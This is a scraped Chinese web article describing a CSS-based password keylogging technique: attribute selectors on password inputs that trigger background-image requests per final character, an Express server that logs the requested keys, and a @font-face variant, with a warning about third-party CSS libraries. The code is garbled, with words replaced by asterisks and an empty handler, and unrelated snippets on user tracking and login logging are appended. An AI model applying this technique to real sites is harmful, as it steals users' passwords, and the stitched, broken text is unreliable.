簡單的css**,甚至不符合圖靈完備的語言,但是也能成為一些攻擊者的工具,下面簡單介紹一下如何使用css去記錄www.cppcns.com使用者的密碼。但是這些css指令碼會出現在第三方css庫中,所以使用第三方css庫也需要謹慎,確保**安全。直接上**解析:
input[type="password"][value$="0"]
input[type="password"][value$="1"]
input[type="password"][value$="2"]
以上是部分**,我們來解析一下css**
input[type="password"]是css選擇器,作用是選擇密碼輸入框,[value$="0"]表示匹配輸入的值是以0結尾的。所以:
input[type="password"][value$="0"]
上面**的意思就是如果你在密碼框中輸入0,就去請求http://localhost:3000/0介面,但是瀏覽器預設情況下是不會將使用者輸入的值儲存在value屬性中,但是有的框架會同步這些值,例如react。
所以只要使用了如下圖的指令碼就能去儲存使用者的輸入資料資訊。
我們再來看一下伺服器端的**:
const express = require("express");
const app = express();
app.get("/:key", (req, res) => );
app.listen(3000, () => console.log("啟動,監聽3000埠"));
使用express建立伺服器,監聽3000埠,只要請求http://localhost:3000/:key,就能輸出key的值,就能在伺服器上記錄輸入的值。所以只要在每輸入乙個值都匹配,然後通過 background-image 去請求乙個已經準備好的介面,就www.cppcns.com能記錄使用者的輸入。類似的方法記錄使用者的內容的css**@font-face
html
你使用的的css的程式設計客棧簡單的字型庫,只要你的頁面中包含a,就會去請求http://localhost:3000/a,這樣就能知道你的頁面中包含有a字元。
本文標題: css 記錄使用者密碼的方法
本文位址: /web/css/85767.html
跟蹤記錄使用者
1 標記承載使用者身份的http請求首部 form 存放email user agent 監聽瀏覽器 3 使用者登入 4 胖url,開始進入 的時候,會生成乙個標識,加在每個a標籤上,當訪問此網頁的所有鏈結時,伺服器識別出標識知 道還是這個客戶,1缺點 1.不美觀,2.對伺服器生產額外複雜 3.不能...
記錄使用者操作
在最近工作中,博主手頭上的web專案提了乙個新的需求,這個需求大體上就是希望系統能夠記錄使用者做了哪些操作,包括這些操作的細節。大家都知道,使用者的操作無非就是增,刪,改,查。因為我現在做的這個專案對使用者的查詢操作不敏感,所以只需記錄增,刪,改。在做之前呢,我的leader給了我乙個建議 你要不寫...
記錄使用者登入日誌
我們可以在專案中,實現使用者登入日誌記錄。簡單實現方法,如下 在資料中建立一張表,儲存一些相關的資訊。setansi nulls ongo setquoted identifier ongo create table dbo loginlog loginlogid int identity 1 1 ...